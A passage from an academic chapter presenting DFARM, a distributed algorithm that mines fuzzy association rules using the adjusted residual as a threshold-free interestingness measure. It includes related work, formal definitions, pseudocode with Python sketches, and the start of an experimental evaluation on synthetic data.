parallel or distributed systems becomes more and more important to the success of fuzzy association rule mining algorithms. Regardless of whether an algorithm is developed to discover (crisp) association rules (e.g., Agrawal et al., 1993; Agrawal & Shafer, 1996; Agrawal & Srikant, 1994; Cheung et al., 1996; E.-H. Han, Karypis, & Kumar, 1997; Mannila, Toivonen, & Verkamo, 1994; Park, Chen, & Yu, 1995a, 1995b; Savasere, Omiecinski, & Navathe, 1995; Shintani & Kitsuregawa, 1996; Srikant & Agrawal, 1996) or fuzzy association rules (e.g., Delgado et al., 2003; Hong et al., 1999; Kuok et al., 1998; Zhang, 1999), it typically employs the support-confidence framework to mine interesting associations from databases. Based on this framework, an association is considered interesting if it satisfies the minimum support and minimum confidence thresholds supplied by a user. While these algorithms can be effective in many tasks, it is often difficult to decide what the thresholds should be. If the thresholds are not set properly, the discovered association rules can be quite misleading (J. Han & Kamber, 2001; Hand et al., 2001). For an algorithm to reveal association rules more effectively, an objective interestingness measure that does not require a lot of trial-and-error effort by the user is necessary. In this chapter, we propose a new algorithm, called distributed fuzzy association rule mining (DFARM), for mining fuzzy association rules from very large databases in a distributed environment. It embraces an objective interestingness measure, called the adjusted residual (Haberman, 1973). Based on the concept of statistical residual analysis, it is defined as a function of the difference between the actual and the expected number of tuples characterized by different attributes and attribute values. We show how to apply this measure to fuzzy data here. By virtue of this measure, DFARM is able to differentiate between interesting and uninteresting associations without having a user supply any thresholds. To the best of our knowledge, DFARM is the first distributed algorithm that utilizes an objective measure for mining interesting associa-
tions from fuzzy data without any user-specified thresholds. DFARM begins by dividing a database into several horizontal partitions and assigning them to different sites in a distributed system. It then has each site scan its own database partition to obtain the number of tuples characterized by different linguistic variables and linguistic terms (i.e., the local counts), and exchanges the local counts with all the other sites to find the global counts. Based on the global counts, the adjusted residuals are computed and the sites can reveal interesting associations. By repeating this process of counting, exchanging counts, and calculating the adjusted residuals, DFARM unveils the underlying interesting associations hidden in the data. We made use of two synthetic data sets to evaluate the effectiveness of the interestingness measure in discriminating interesting associations from uninteresting ones. We also implemented DFARM in a distributed system using the parallel virtual machine (PVM; Geist, Beguelin, Dongarra, Jiang, Manchek, & Sunderam, 1994), and used a popular benchmark data set to evaluate its performance. The results show that DFARM has very good size-up, speedup, and scale-up performance.
RELATED WORK

The mining of association rules based on the support-confidence framework is defined as follows (Agrawal et al., 1993). Let I = {i1, …, im} be a set of binary attributes, called items, and T be a set of transactions. Each transaction t ∈ T is represented as a binary vector with t[k] = 1 if t contains item ik, otherwise t[k] = 0 for k = 1, …, m. A set of items is known as an item set. A k-item set is an item set consisting of k items. The support of an item set, X ⊂ I, is defined as the percentage of tuples containing X. The item set is frequent if its support is greater than or equal to the user-specified minimum support. An association rule is defined as an implication of the form X → Y, where X ⊂ I,
Y ⊂ I and X ∩ Y = ∅. The rule X → Y holds in T with support, which is defined as the percentage of tuples containing X and Y, and confidence, which is defined as the percentage of tuples containing Y given that they also contain X. An association rule is interesting if its support and confidence are greater than or equal to the user-supplied minimum support and minimum confidence, respectively. Since they are defined over binary data, they are usually referred to as Boolean association rules. The ensuing algorithms first find all frequent item sets in a database and then generate association rules from these frequent item sets. Since the former step consumes most of the computational resources, current research primarily focuses on speeding up the process of discovering frequent item sets (Agrawal et al., 1993; Agrawal & Srikant, 1994; Mannila et al., 1994; Park et al., 1995a; Savasere et al., 1995). Apriori (Agrawal & Srikant, 1994) is a well-known algorithm for mining Boolean association rules. First of all, it generates a set of candidate 1-item sets, C1. It then scans all the transactions to obtain the support counts of the item sets in C1. The item sets whose supports satisfy the minimum support become frequent 1-item sets, F1. After that, Apriori generates a set of candidate 2-item sets, C2, from F1. It then examines the item sets in C2. If any subset of an item set in C2 is not in F1, it eliminates the item set from C2. It subsequently scans all the transactions to find the support counts of the item sets in C2. The item sets whose supports satisfy the minimum support become frequent 2-item sets, F2. Apriori then continues to generate candidates and find frequent 3-item sets and so forth until no frequent item sets or candidate item sets are found. Different techniques, including those in Park et al. (1995a) and Savasere et al. (1995), have been proposed to improve the efficiency of the algorithm. Unlike Apriori and its variants, a method called FP-growth (J. Han, Pei, & Yin, 2000) is proposed to mine frequent item sets without candidate generation. It first compresses the database into an FP-tree,
but retains the item set association information at the same time. It then divides the FP-tree into a set of conditional databases, each of which is associated with one frequent item, and it mines each such database separately. The FP-growth method transforms the problem of finding long frequent item sets to looking for shorter ones recursively and then concatenating the suffix (J. Han et al.). It is shown in J. Han et al. that this method is about an order of magnitude faster than Apriori. In order to handle very large databases, the serial approaches to mining Boolean association rules (e.g., Agrawal et al., 1993; Agrawal & Srikant, 1994; Mannila et al., 1994; Park et al., 1995a; Savasere et al., 1995) have been extended to take advantage of the scalability of parallel or distributed systems. Three algorithms, namely, count distribution, data distribution, and candidate distribution, which adopt Apriori in the distributed-memory architecture, are proposed in Agrawal and Shafer (1996). These algorithms divide a database into several horizontal partitions and assign them to different processors. In count distribution, every processor runs Apriori over its database partition with a modification in which it (a) exchanges the local support counts of candidate item sets in its database partition with all the other processors to find the global support counts in the entire database and (b) identifies frequent item sets based on the global support counts at each of the iterations. Data distribution partitions candidate item sets and assigns them to different processors in a round-robin fashion. At each of the iterations, every processor broadcasts its database partition to all the other processors to find the global support counts of its candidate item sets. Candidate distribution starts the data mining process by utilizing either count distribution or data distribution. At certain iterations, it divides the candidate item sets into several disjoint subsets and assigns different subsets to different processors. At the same time, the database is repartitioned in such a way that each
processor can find the (global) support counts of its candidate item sets in its database partition independent of other processors. To achieve this, parts of the database may be replicated on several processors. Each processor then generates candidate item sets and counts the supports of these candidate item sets independently at subsequent iterations. In addition to these three algorithms, other parallel algorithms based on Apriori are also proposed in the literature (Cheung et al., 1996a; E.-H. Han et al., 1997; Park et al., 1995b; Shintani & Kitsuregawa, 1996). Regardless of whether an algorithm is serial or parallel, it determines if an association is interesting by means of the user-specified minimum support and minimum confidence thresholds. A weakness is that many users do not have any idea what the thresholds should be. If they are set too high, a user may miss some useful rules; if they are set too low, the user may be overwhelmed by many irrelevant ones (J. Han & Kamber, 2001; Hand et al., 2001). The techniques for mining Boolean association rules are extended to take discrete- and continuous-valued data into consideration. Association rules involving discrete and continuous attributes are known as quantitative association rules (Srikant & Agrawal, 1996). To handle continuous attributes, their domains are discretized into a finite number of intervals. The discretization can be performed as a part of the algorithms (e.g., Srikant & Agrawal) or as a preprocessing step before data mining (e.g., Liu et al., 1998). Both discrete and continuous attributes are handled in a uniform fashion as a set of ⟨attribute, value⟩ pairs by mapping the values of discrete attributes to a set of consecutive integers and by mapping the discretized intervals of continuous attributes to consecutive integers, which preserve the order of the intervals (Srikant & Agrawal). Instead of having just one field for each attribute, it needs to use as many fields as the number of different attribute values. For example, the value of a Boolean field
corresponding to ⟨attribute1, value1⟩ would be 1 if attribute1 has value1 in the original record, and 0 otherwise (Srikant & Agrawal). After the mappings, both the serial and parallel algorithms for mining Boolean association rules, such as those in Agrawal et al. (1993), Agrawal and Shafer (1996), Agrawal and Srikant, Cheung et al. (1996), E.-H. Han et al. (1997), J. Han et al. (2000), Mannila et al. (1994), Park et al. (1995a, 1995b), Savasere et al. (1995), and Shintani and Kitsuregawa (1996), can be applied to the encoded data. Regardless of how the domains of continuous attributes are discretized, the intervals may not be concise and meaningful enough for human users to easily obtain nontrivial knowledge from the discovered patterns. To better handle continuous data, the use of fuzzy sets in the mining of association rules has recently been proposed in the literature (Au & Chan, 2001, 2003; Chan & Au, 1997, 2001; Delgado et al., 2003; Hong et al., 1999; Kuok et al., 1998; Zhang, 1999). These algorithms typically use a fuzzy partitioning methodology to generate fuzzy sets representing the domain of each continuous attribute as a preprocessing step. The fuzzy sets can be supplied by domain experts or generated automatically from the data by fuzzy partitioning approaches, such as in Au, Chan, and Wong (2006). For algorithms, such as in Delgado et al. (2003), Hong et al. (1999), Kuok et al. (1998), and Zhang (1999), to mine interesting associations from the fuzzified data, they adopt the support-confidence framework. Similar to their contemporary algorithms for mining (crisp) association rules, they encounter the same problem: it is usually difficult to determine what the user-specified minimum support and minimum confidence ought to be. Some meaningful relationships may not be found if they are set too high, whereas some misleading relationships may be revealed if they are set too low (J. Han & Kamber, 2001; Hand et al., 2001).
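To make the counting step of count distribution concrete, the following is a minimal, single-process sketch of one round of the scheme described above; the function names (local_support_counts, all_reduce_counts) and the dictionary-based bookkeeping are assumptions introduced here for illustration and are not taken from the algorithms cited above.

def local_support_counts(partition, candidates):
    """Count, within one processor's database partition only, how many
    transactions contain each candidate item set (the local counts)."""
    counts = {c: 0 for c in candidates}
    for transaction in partition:
        items = set(transaction)
        for c in candidates:
            if set(c) <= items:
                counts[c] += 1
    return counts

def all_reduce_counts(counts_per_processor):
    """Stand-in for the exchange step: after the exchange, every processor
    holds the global counts, i.e., the sum of all local counts."""
    total = {}
    for counts in counts_per_processor:
        for c, n in counts.items():
            total[c] = total.get(c, 0) + n
    return total

def count_distribution_round(partitions, candidates, min_support_count):
    """One iteration: count locally on each partition, merge into global
    counts, and keep the candidates that meet the minimum support."""
    local = [local_support_counts(p, candidates) for p in partitions]
    global_counts = all_reduce_counts(local)
    return [c for c in candidates if global_counts[c] >= min_support_count]

In such a scheme, only the (small) count dictionaries travel between processors, which is what keeps the communication cost low relative to the local counting work.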
IDENTIFYING INTERESTING ASSOCIATIONS

In the following subsections, we present (a) the definition of linguistic variables and linguistic terms, (b) an objective measure for identifying interesting associations between different linguistic terms, and (c) the formation of fuzzy rules to represent the interesting associations and how to represent the uncertainty associated with the rules.

Linguistic Variables and Linguistic Terms

Given a database relation D, each tuple t in D is composed of a set of attributes A = {A1, …, An}, where A1, …, An can be continuous or discrete. For any tuple, t ∈ D, t[Ai] denotes the value ai in t for attribute Ai. Let L = {L1, …, Ln} be a set of linguistic variables such that Li represents Ai. For any continuous attribute Ai, let dom(Ai) = [li, ui] ⊆ ℜ denote the domain of the attribute. Ai is represented by a linguistic variable Li whose value is one of the linguistic terms in T(Li) = {lij | j = 1, …, si}, where si denotes the number of linguistic terms and lij is a linguistic term characterized by a fuzzy set Fij that is defined on dom(Ai) and whose membership function is μFij such that

μFij : dom(Ai) → [0, 1].     (1)

The fuzzy sets Fij, j = 1, …, si, are represented by

Fij = ∫dom(Ai) μFij(ai) / ai,     (2)

where ai ∈ dom(Ai).
For any discrete attribute Ai, let dom(Ai) = {ai1, …, aimi} denote the domain of Ai. Ai is represented by a linguistic variable Li whose value is one of the linguistic terms in T(Li) = {lij | j = 1, …, mi}, where lij is a linguistic term characterized by a fuzzy set Fij such that

Fij = Σdom(Ai) μFij(ai) / ai,     (3)

where ai ∈ dom(Ai). Regardless of whether Ai is discrete or continuous, the degree of compatibility of ai ∈ dom(Ai) with linguistic term lij is given by μFij(ai).
In addition to handling discrete and continuous attributes in a uniform fashion, the use of linguistic variables to represent discrete attributes allows the fuzzy nature of real-world entities to be easily captured. For example, it may be difficult to discriminate the color orange from the color red. It is for this reason that an object, which is orange in color, may be perceived as red in color to a certain extent. Such kinds of fuzziness in linguistic variable Color can be represented by linguistic terms Red and Orange. Based on these linguistic terms, the color of an object can be compatible with the term Red to a degree of 0.7 and with the term Orange to a degree of 0.3. Interested readers are referred to Mendel (1995) and Yen and Langari (1999) for the details of linguistic variables, linguistic terms, fuzzy sets, and membership functions.
Using the above technique, the original attributes in A = {Ai | i = 1, …, n} are represented by the linguistic variables in L = {Li | i = 1, …, n}. These linguistic variables are associated with a set of linguistic terms, l = {lij | i = 1, …, n, j = 1, …, si}. These linguistic terms are, in turn, characterized by a set of fuzzy sets, F = {Fij | i = 1, …, n, j = 1, …, si}. Given a tuple t ∈ D and a linguistic term lij ∈ l, which is characterized by a fuzzy set Fij ∈ F, the degree of membership of the values in t with respect to Fij is given by μFij(t[Ai]). The degree to which t is characterized by lij, λlij(t), is defined as
λlij(t) = μFij(t[Ai]).     (4)

For example, given a linguistic variable Height and a linguistic term Tall, we have λTall(t) = μTall(t[Height]).
If λlij(t) = 1, t is completely characterized by the linguistic term lij. If λlij(t) = 0, t is undoubtedly not characterized by the linguistic term lij. If 0 < λlij(t) < 1, t is partially characterized by the linguistic term lij. In the case where t[Ai] is unknown, λlij(t) = 0.5, which indicates that there is no information available concerning whether t is or is not characterized by the linguistic term lij.
t can also be characterized by more than one linguistic term. Let ϕ be a subset of integers such that ϕ = {i1, …, ih}, where ϕ ⊆ {1, …, n} and |ϕ| = h ≥ 1. We also suppose that Aϕ is a subset of A such that Aϕ = {Ai | i ∈ ϕ}. Given any Aϕ, it is associated with a set of linguistic terms, T(Lϕ) = {lϕj | j = 1, …, sϕ = ∏i∈ϕ si}, where sϕ denotes the number of linguistic terms and lϕj is represented by a fuzzy set Fϕj such that Fϕj = Fi1j1 ∩ … ∩ Fihjh, ik ∈ ϕ, jk ∈ {1, …, sik}. The degree to which t is characterized by the term lϕj, λlϕj(t), is given by

λlϕj(t) = min(μFi1j1(t[Ai1]), …, μFihjh(t[Aih])).     (5)
For instance, given linguistic variables Height and Weight, and linguistic terms Tall and Heavy, we have λTall ∧ Heavy = min(μTall(t[Height]), μHeavy(t[Weight])). In fact, other t-norms (e.g., the multiplication operation) can also be used in the calculation of Equation 5. We use the minimum operation here because it is one of the most popular t-norms used in the literature (see, e.g., Mendel, 1995; Yen & Langari, 1999). Based on the linguistic variables and linguistic terms, we can use DFARM to discover fuzzy association rules that are represented in a manner that is more natural for human users to understand when compared to their crisp counterparts.
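As a small illustration of Equations 4 and 5, the sketch below evaluates the degree to which a tuple is characterized by a single linguistic term and by a compound term; the trapezoidal membership function and the particular breakpoints are assumptions chosen only for this example.

def trapezoid(a, b, c, d):
    """Membership function that rises on [a, b], equals 1 on [b, c], and falls on [c, d]."""
    def mu(x):
        if x <= a or x >= d:
            return 0.0
        if b <= x <= c:
            return 1.0
        return (x - a) / (b - a) if x < b else (d - x) / (d - c)
    return mu

# Hypothetical linguistic terms for two linguistic variables.
mu_tall = trapezoid(160, 175, 250, 251)   # Height = Tall (in cm)
mu_heavy = trapezoid(70, 85, 300, 301)    # Weight = Heavy (in kg)

t = {"Height": 178, "Weight": 80}

# Equation 4: degree to which t is characterized by a single term.
lambda_tall = mu_tall(t["Height"])

# Equation 5: a compound term combines its components with the minimum t-norm.
lambda_tall_and_heavy = min(mu_tall(t["Height"]), mu_heavy(t["Weight"]))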
An Objective Interestingness Measure

We define the fuzzy support of a linguistic term lϕk, which is represented by fsup(lϕk), as

fsup(lϕk) = [Σ_{t∈D} λlϕk(t)] / [Σ_{t∈D} Σ_{j=1..sϕ} λlϕj(t)],     (6)

where the numerator and the denominator are the cardinality of lϕk and that of all the linguistic terms defined in the same domain, respectively. Since Σ_{k=1..sϕ} fsup(lϕk) = 1, fsup(lϕk) can be considered the probability that a tuple is characterized by linguistic term lϕk.
In the rest of this chapter, the association between a linguistic term lϕk and another linguistic term lpq is expressed as lϕk → lpq, for example, Cheap ∧ Light → Best Seller, where Cheap, Light, and Best Seller are linguistic terms. We define the fuzzy support of the association lϕk → lpq, fsup(lϕk → lpq), as

fsup(lϕk → lpq) = [Σ_{t∈D} min(λlϕk(t), λlpq(t))] / [Σ_{t∈D} Σ_{j=1..sϕ} Σ_{u=1..sp} min(λlϕj(t), λlpu(t))],     (7)

where the numerator is the cardinality of Fϕk ∩ Fpq while the denominator is the cardinality of all the possible combinations of fuzzy sets defined in the same domain. Similarly, Σ_{j=1..sϕ} Σ_{u=1..sp} fsup(lϕj → lpu) = 1, and hence fsup(lϕk → lpq) can be considered the probability that a tuple is characterized by both lϕk and lpq. Other t-norms, such as the multiplication operation, are also applicable to the calculation of the fuzzy support. We use the minimum operation in Equation 7 so as to be consistent with Equation 5.
We, in turn, define the fuzzy confidence of the association lϕk → lpq, fconf(lϕk → lpq), as

fconf(lϕk → lpq) = fsup(lϕk → lpq) / fsup(lϕk).     (8)

Intuitively, fconf(lϕk → lpq) can be considered the probability that a tuple is characterized by lpq given that it is also characterized by lϕk.
To decide whether the association lϕk → lpq is interesting, we determine whether the difference between fconf(lϕk → lpq) and fsup(lpq) is significant. The significance of the difference can be objectively evaluated using the adjusted residual (Haberman, 1973). It is defined in terms of the fuzzy support and the fuzzy confidence (Au & Chan, 2001, 2003; Chan & Au, 1997, 2001) that reflects the difference in the actual and the expected degree to which a tuple is characterized by different linguistic terms. The adjusted residual d(lϕk → lpq) is defined in Haberman (1973) as

d(lϕk → lpq) = z(lϕk → lpq) / √γ(lϕk → lpq),     (9)

where z(lϕk → lpq) is the standardized residual, which is defined as

z(lϕk → lpq) = [fsup(lϕk → lpq) × Σ_{t∈D} Σ_{j=1..sϕ} Σ_{u=1..sp} min(λlϕj(t), λlpu(t)) − e(lϕk → lpq)] / √e(lϕk → lpq).     (10)

e(lϕk → lpq) is the expected degree to which a tuple is characterized by lϕk and lpq and is calculated by

e(lϕk → lpq) = fsup(lϕk) × fsup(lpq) × Σ_{t∈D} Σ_{j=1..sϕ} Σ_{u=1..sp} min(λlϕj(t), λlpu(t)),     (11)

and γ(lϕk → lpq) is the maximum likelihood estimate of the variance of z(lϕk → lpq) and is given by

γ(lϕk → lpq) = (1 − fsup(lϕk))(1 − fsup(lpq)).     (12)

The measure defined by Equation 9 can be used as an objective interestingness measure because it does not depend on any user's subjective inputs. Since d(lϕk → lpq) approximately follows a standard normal distribution, if |d(lϕk → lpq)| > 1.96 (the critical value of the standard normal distribution for a two-tailed test at the 5% level), we conclude that the difference between fconf(lϕk → lpq) and fsup(lpq) is significant at the 5% significance level. Specifically, if d(lϕk → lpq) > 1.96, the presence of lϕk implies the presence of lpq. In other words, whenever lϕk is found in a tuple, the probability that lpq is also found in the same tuple is expected to be significantly higher than when lϕk is not found. We say that the association lϕk → lpq is positive. On the other hand, if d(lϕk → lpq) < –1.96, the presence of lϕk implies the absence of lpq. In other words, whenever lϕk is found in a tuple, the probability that lpq is also found in the same tuple is expected to be significantly lower than when lϕk is not found. We say that the association lϕk → lpq is negative.
It is important to note that d(lϕk → lpq) is defined in terms of the fuzzy support and the fuzzy confidence of the linguistic terms. They are, in turn, defined in terms of the probabilities of the corresponding fuzzy events. As a result, the conclusion that the adjusted residual approximately follows a standard normal distribution (Haberman, 1973) is still valid.
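To make the computation of Equations 6 through 12 concrete, the following sketch evaluates the adjusted residual of a single candidate association from per-tuple membership degrees; it is a minimal illustration under assumed input structures (plain Python lists of λ values), not the authors' implementation.

import math

def adjusted_residual(deg_ant, deg_con, deg_ant_terms, deg_con_terms):
    """Compute d(l_phi_k -> l_pq).

    deg_ant[t]          : lambda of the antecedent term l_phi_k for tuple t
    deg_con[t]          : lambda of the consequent term l_pq for tuple t
    deg_ant_terms[j][t] : lambda of every term l_phi_j defined on the same
                          attribute set as the antecedent
    deg_con_terms[u][t] : lambda of every term l_pu defined on the same
                          attribute as the consequent
    """
    n = len(deg_ant)

    # Denominators of Equations 6 and 7 (cardinalities over all terms).
    denom_ant = sum(a[t] for a in deg_ant_terms for t in range(n))
    denom_con = sum(c[t] for c in deg_con_terms for t in range(n))
    total = sum(min(a[t], c[t])
                for a in deg_ant_terms for c in deg_con_terms for t in range(n))

    # Fuzzy supports (Equations 6 and 7) and the observed joint cardinality.
    fsup_ant = sum(deg_ant) / denom_ant
    fsup_con = sum(deg_con) / denom_con
    observed = sum(min(deg_ant[t], deg_con[t]) for t in range(n))

    # Expected degree (Eq. 11), standardized residual (Eq. 10),
    # variance estimate (Eq. 12), and adjusted residual (Eq. 9).
    expected = fsup_ant * fsup_con * total
    z = (observed - expected) / math.sqrt(expected)
    gamma = (1.0 - fsup_ant) * (1.0 - fsup_con)
    return z / math.sqrt(gamma)

A returned value above 1.96 would mark the association as positive and a value below −1.96 as negative, as described above.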
Formation of Fuzzy Association Rules
In the context of rule mining, the number of conditions in the antecedent of a rule is often referred to as its order (Smyth & Goodman, 1992; Wong & Wang, 1997). A first-order fuzzy association rule can be defined as a rule involving one linguistic term in its antecedent. A second-order fuzzy association rule can be defined as a rule involving two linguistic terms in its antecedent. A third-order
fuzzy association rule can be defined as a rule involving three linguistic terms in its antecedent, and so on for other higher orders.
Given that lϕk → lpq is interesting, we can form the following fuzzy association rule:

lϕk → lpq [w(lϕk → lpq)],

where w(lϕk → lpq) is the weight-of-evidence measure (Osteyee & Good, 1974), which is a confidence measure that represents the uncertainty associated with lϕk → lpq. This measure is defined as follows.
Since the relationship between lϕk and lpq is interesting, there is some evidence for a tuple to be characterized by lpq given that it has lϕk. The weight of evidence is defined in terms of an information-theoretic measure known as mutual information (see, e.g., MacKay, 2003). The mutual information measures the change of uncertainty about the presence of lpq in a tuple given that it has lϕk. It is defined as

I(lpq : lϕk) = log [fconf(lϕk → lpq) / fsup(lpq)].     (13)

Based on mutual information, the weight of evidence is defined in Osteyee and Good (1974) as

w(lϕk → lpq) = I(lpq : lϕk) − I(∪_{j≠q} lpj : lϕk) = log { [fsup(lϕk → lpq) / fsup(lpq)] / [fsup(∪_{j≠q} (lϕk → lpj)) / fsup(∪_{j≠q} lpj)] }.     (14)

w(lϕk → lpq) can be interpreted intuitively as a measure of the difference in the gain in information when a tuple that is characterized by lϕk is also characterized by lpq as opposed to being characterized by other linguistic terms.
Since lϕk is defined by a set of linguistic terms li1j1, …, lihjh ∈ l, we have a high-order fuzzy association rule

Li1 = li1j1 ∧ … ∧ Lih = lihjh → Lp = lpq [w(lϕk → lpq)],

where i1, …, ih ∈ ϕ.

DISTRIBUTED MINING OF FUZZY ASSOCIATION RULES
In this section, we present DFARM, which is a distributed algorithm for discovering fuzzy association rules. It extends count distribution (Agrawal & Shafer, 1996) to (a) handle fuzzy data and (b) utilize the objective interestingness measure presented in the previous section to differentiate interesting and uninteresting associations. To handle the large combination of linguistic terms, it embraces a heuristic that the association lϕ′k → lpq, where ϕ′ = ϕ1 ∪ ϕ2, is more likely to be interesting if both the associations lϕ1k → lpq and lϕ2k → lpq are interesting vs. the case where only one or neither of them is interesting. Using this heuristic, DFARM evaluates the interestingness of only the associations between different combinations of conditions in lower order association rules. The details of DFARM are given in the following.
In a distributed system comprising m sites S1, …, Sm, the database relation D is horizontally partitioned over the m sites into D1, …, Dm. Let the number of tuples in database partition Dj be Nj, j = 1, …, m. The fuzzy support count of linguistic term lϕk, where ϕ ⊆ {1, …, n} and |ϕ| = h ≥ 1, in D is given by

count(lϕk) = Σ_{t∈D} λlϕk(t),     (15)

where λlϕk(t) is the degree to which t is characterized by lϕk, defined by Equation 4. Similarly, the fuzzy support count of lϕk in Dj is calculated by

count_j(lϕk) = Σ_{t∈Dj} λlϕk(t).     (16)

It is obvious to note that

count(lϕk) = Σ_{j=1..m} count_j(lϕk).     (17)

We refer to count(lϕk) as the global fuzzy support count of lϕk, and count_j(lϕk) as the local fuzzy support count of lϕk at site Sj.
Let us consider an hth-order association, lϕk → lpq. The fuzzy support count of lϕk → lpq in D is given by

count(lϕk → lpq) = Σ_{t∈D} min(λlϕk(t), λlpq(t)),     (18)

whereas the fuzzy support count of lϕk → lpq in Dj is calculated by

count_j(lϕk → lpq) = Σ_{t∈Dj} min(λlϕk(t), λlpq(t)).     (19)

Again, it is obvious to note that

count(lϕk → lpq) = Σ_{j=1..m} count_j(lϕk → lpq).     (20)

We refer to count(lϕk → lpq) as the global fuzzy support count of lϕk → lpq, and count_j(lϕk → lpq) as the local fuzzy support count of lϕk → lpq at site Sj.

Figure 1. The DFARM algorithm

/* Rh consists of hth-order rules */
if (h = 1) then {
    forall (lik, lpq ∈ l, i ≠ p) {
        scan Dj to find countj(lik), countj(lpq), and countj(lik → lpq);
    }
    exchange countj(lik), countj(lpq), and countj(lik → lpq) with all the other sites
        to calculate count(lik), count(lpq), and count(lik → lpq);
    R1 = {lik → lpq [w(lik → lpq)] | i ≠ p and d(lik → lpq) > 1.96};
} else {
    C = {each linguistic term in the antecedent of r | r ∈ Rh – 1}
    forall (lϕk comprising h linguistic terms in C) {
        forall (lpq, q = 1, …, sp) {
            scan Dj to find countj(lϕk), countj(lpq), and countj(lϕk → lpq);
        }
    }
    exchange countj(lϕk), countj(lpq), and countj(lϕk → lpq) with all the other sites
        to calculate count(lϕk), count(lpq), and count(lϕk → lpq);
    Rh = {lϕk → lpq [w(lϕk → lpq)] | d(lϕk → lpq) > 1.96};
}

The fuzzy support of the linguistic term lϕk and that of the association lϕk → lpq in terms of fuzzy support counts are given by

fsup(lϕk) = count(lϕk) / Σ_{j=1..sϕ} count(lϕj)     (21)

and

fsup(lϕk → lpq) = count(lϕk → lpq) / Σ_{j=1..sϕ} Σ_{u=1..sp} count(lϕj → lpu),     (22)
respectively. Based on Equations 21 and 22, we can calculate d(lϕk → lpq), defined by Equation 9, to determine whether the association lϕk → lpq is or is not interesting. To mine fuzzy association rules, each site in the distributed system runs DFARM. Each site scans its database partition in each pass. At the hth iteration, each site Sj generates the candidate hth-order rules from the (h – 1)th-order rules. Site Sj then scans its database partition Dj to obtain the local fuzzy support counts of all the candidate hth-order rules. After that, site Sj exchanges the local fuzzy support counts with all the other sites to find the global fuzzy support counts. Subsequently, each site Sj evaluates the interestingness of the candidate hth-order rules to obtain the interesting ones (i.e., the hth-order rules). Site Sj then generates the candidate (h + 1)th-order rules from the hth-order rules and this process repeats. The algorithm terminates when neither an hth-order rule nor a candidate (h + 1)th-order rule is found. Figure 1 shows this algorithm. Since each site in the distributed system exchanges its local fuzzy counts with all the other sites to calculate the global fuzzy counts, the (h – 1)th-order rules and hence the candidate hth-order rules, which are generated from the (h – 1)th-order rules, found at different sites are identical for all h. After the termination of DFARM, each site therefore discovers an identical set of fuzzy association rules. As an example, given a database comprising three attributes, Age, Marital Status, and Wage, let dom(Age) be represented by linguistic terms, Young, Middle Aged, and Old; dom(Marital Status) be represented by Unmarried and Married; and dom(Wage) be represented by Low and High. If DFARM finds first-order rules Young → Low, High → Middle Aged, and Married → High are interesting, it obtains R1 = {Young → Low, High → Middle Aged, Married → High} and C = {Young, High, Married}. It then computes the adjusted residuals of the candidate second-order rules (i.e., Young ∧ High → Unmarried, Young ∧
High → Married, Young ∧ Married → Low, Young ∧ Married → High, High ∧ Married → Young, High ∧ Married → Middle Aged, and High ∧ Married → Old) to determine whether they are interesting. It continues to find the candidate higher order rules and calculates their interestingness until neither an interesting rule nor a candidate rule is found.
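The iterative process just described can be summarized in a short driver loop. The sketch below is a simplified, single-process rendering of one site's role: counting is done per partition, the local counts are summed to stand in for the exchange step, and the interestingness test is passed in as a black-box function. The names (term_degrees, adjusted_residual, and so on) are assumptions for illustration and do not come from the original DFARM implementation.

from itertools import combinations

def dfarm(partitions, term_degrees, adjusted_residual, threshold=1.96):
    """Simplified DFARM iteration.

    partitions        : list of database partitions, each a list of tuples
    term_degrees      : dict mapping a term (attribute, value) to a function
                        returning its membership degree for a tuple
    adjusted_residual : function of (global_counts, candidate) implementing
                        Equation 9 from the global fuzzy support counts
    """
    terms = list(term_degrees)
    rules, order = [], 1
    # First-order candidates: one antecedent term, consequent on another attribute.
    candidates = [((a,), c) for a in terms for c in terms if a[0] != c[0]]
    while candidates:
        # Each "site" counts over its own partition (local counts, Eqs. 16 and 19) ...
        local = [{(ant, con): sum(min(min(term_degrees[a](t) for a in ant),
                                      term_degrees[con](t)) for t in part)
                  for ant, con in candidates}
                 for part in partitions]
        # ... and the local counts are summed into global counts (Eqs. 17 and 20).
        global_counts = {c: sum(site[c] for site in local) for c in candidates}
        kept = [c for c in candidates if adjusted_residual(global_counts, c) > threshold]
        rules.extend(kept)
        # Candidate (h + 1)th-order rules combine antecedent terms of the kept rules.
        order += 1
        antecedent_terms = sorted({a for ant, _ in kept for a in ant})
        candidates = [(tuple(comb), c)
                      for comb in combinations(antecedent_terms, order)
                      for c in terms if all(a[0] != c[0] for a in comb)]
    return rules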
EXPERIMENTAL RESULTS

To evaluate the effectiveness of the proposed interestingness measure, as given by Equation 9, we applied it to two synthetic data sets. Furthermore, we implemented DFARM in a distributed system using PVM (Geist et al., 1994). To perform our experiments, we used a 100 Mb LAN (local area network) to connect 10 Sun Ultra 5 workstations, each of which has 64 MB of main memory running Solaris 2.5.1. Each workstation has a local drive and its database partition was loaded on its local drive before each experiment started. We used a popular benchmark data set to evaluate the computation performance of DFARM.

An Evaluation of Effectiveness

In this subsection, we used two synthetic data sets to evaluate the effectiveness of the proposed interestingness measure. One of the data sets is composed of only uniform random data, whereas the other is generated in a way that inherent relationships are present in the data.

Testing with Uniform Random Data

In our first experiment, we used a set of uniform random data to evaluate the ability of the proposed interestingness measure to handle noise when the data contain no organization or structure. The data set consists of 2,000 pairs of values generated randomly and independently for two attributes, X and Y, in the range between 0 and 10. Since the data
are generated randomly, no interesting associations ought to be discovered. Figure 2 shows the data.
From the data set, we employed the fuzzy partitioning approach proposed in Au et al. (2006) to generate five and two fuzzy sets for X and Y, respectively. The membership functions of the fuzzy sets representing the domain of X are the following (see Equation 23).

Equation 23.
μVery Small(x) = 1 if x ≤ 1.97; (2.01 − x)/0.04 if 1.97 < x ≤ 2.01; 0 otherwise
μSmall(x) = (x − 1.97)/0.04 if 1.97 < x ≤ 2.01; 1 if 2.01 < x ≤ 3.99; (4.02 − x)/0.03 if 3.99 < x ≤ 4.02; 0 otherwise
μMedium(x) = (x − 3.99)/0.03 if 3.99 < x ≤ 4.02; 1 if 4.02 < x ≤ 5.99; (6.01 − x)/0.02 if 5.99 < x ≤ 6.01; 0 otherwise
μLarge(x) = (x − 5.99)/0.02 if 5.99 < x ≤ 6.01; 1 if 6.01 < x ≤ 8.00; (8.01 − x)/0.01 if 8.00 < x ≤ 8.01; 0 otherwise
μVery Large(x) = (x − 8.00)/0.01 if 8.00 < x ≤ 8.01; 1 if x > 8.01; 0 otherwise

Equation 24.
μSmall(y) = 1 if y ≤ 4.99; (5.02 − y)/0.03 if 4.99 < y ≤ 5.02; 0 otherwise
